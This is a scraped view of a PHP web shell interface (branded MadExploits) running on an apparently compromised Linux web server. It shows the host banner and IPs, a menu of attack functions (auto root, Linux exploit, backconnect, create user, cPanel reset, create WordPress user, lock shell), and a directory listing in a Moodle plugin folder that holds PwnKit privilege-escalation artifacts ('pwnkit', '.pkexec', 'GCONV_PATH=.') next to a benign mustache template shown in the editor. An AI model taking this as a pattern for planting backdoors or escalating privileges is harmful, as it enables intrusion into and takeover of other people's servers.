Linux aries.aptans.com 4.18.0-348.20.1.lve.1.el8.x86_64 #1 SMP Wed Mar 16 08:45:39 EDT 2022 x86_64
Apache
: 135.181.142.107 | : 172.70.179.154
Cant Read [ /etc/named.conf ]
7.4.33
aja
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
aja /
public_html /
ead /
blocks /
stash /
templates /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
drop_image.mustache
1.8
KB
-rw-r--r--
drop_snippet_dialogue.mustache
1.27
KB
-rw-r--r--
drop_snippet_ui.mustache
3.27
KB
-rw-r--r--
drop_text.mustache
1.31
KB
-rw-r--r--
fullpage_help.mustache
869
B
-rw-r--r--
item.mustache
928
B
-rw-r--r--
item_detail.mustache
1.03
KB
-rw-r--r--
item_select_dialogue.mustache
1.72
KB
-rw-r--r--
item_small.mustache
1.05
KB
-rw-r--r--
item_xsmall.mustache
940
B
-rw-r--r--
main_content.mustache
1.76
KB
-rw-r--r--
profile_content.mustache
1.16
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
trade.mustache
2.82
KB
-rw-r--r--
trade_add_item_detail.mustache
1.22
KB
-rw-r--r--
trade_form.mustache
7.2
KB
-rw-r--r--
trade_item_picker.mustache
3.03
KB
-rw-r--r--
trade_loss_item_detail.mustach...
1.17
KB
-rw-r--r--
trade_snippet_dialogue.mustach...
4.18
KB
-rw-r--r--
trade_success.mustache
781
B
-rw-r--r--
tradeitem_detail.mustache
985
B
-rw-r--r--
user_item.mustache
1.17
KB
-rw-r--r--
user_item_reset.mustache
2.71
KB
-rw-r--r--
user_item_small.mustache
1.12
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : trade_item_picker.mustache
{{! This file is part of Moodle - http://moodle.org/ Moodle is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. Moodle is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with Moodle. If not, see <http://www.gnu.org/licenses/>. }} {{! Trade item picker. }} <div class="main-window container" data-type="{{type}}"> <div class="row"> <label class="span2 col-sm-2">{{#str}}item, block_stash{{/str}}</label> <div class="span5 col-sm-5"> <select id="block-stash-item-select" class="form-control"> {{#items}} <option value="{{id}}" data-imgurl="{{imageurl}}">{{name}}</option> {{/items}} </select> </div> </div> <div class="row"> <label class="span2 col-sm-2 p-y-1">{{#str}}quantity, block_stash{{/str}}</label> <div class="span3 col-sm-3 p-y-1"> <input type="number" class="block-stash-quantity form-control" id="amount" min="1" size="5" value="1" /> </div> </div> <div class="row"> <div class="span2 col-sm-2 p-y-1"> <div class="btn btn-primary" id="submit" role="button" tabindex="0">{{#str}}additem, block_stash{{/str}}</div> </div> </div> </div> {{#js}} require([ 'jquery', 'block_stash/counselor', 'core/templates' ], function($, Counselor, Templates) { $('#submit').click(function(e) { var type = $('.main-window').data('type'); var itemname = $('#block-stash-item-select option:selected').text(); var itemimageurl = $('#block-stash-item-select option:selected').data('imgurl'); var itemid = $('#block-stash-item-select').val(); var itemamount = $('#amount').val(); var templatename; itemamount = parseInt(itemamount); if (!Number.isInteger(itemamount) || itemamount <= 0) { itemamount = 1; } var data = { itemid: itemid, imageurl: itemimageurl, name: itemname, quantity: itemamount, }; if (type === 'gain') { templatename = 'block_stash/trade_add_item_detail'; } else { templatename = 'block_stash/trade_loss_item_detail'; } Templates.render(templatename, data).then(function(html, js) { var placeholder = $('.block_stash_item_box[data-type="' + type + '"').find('.block-stash-placeholder'); $('.block_stash_item_box[data-type="' + type + '"]').append(html); placeholder.remove(); Counselor.trigger('item-save', []); e.preventDefault(); }); }); }); {{/js}}
Close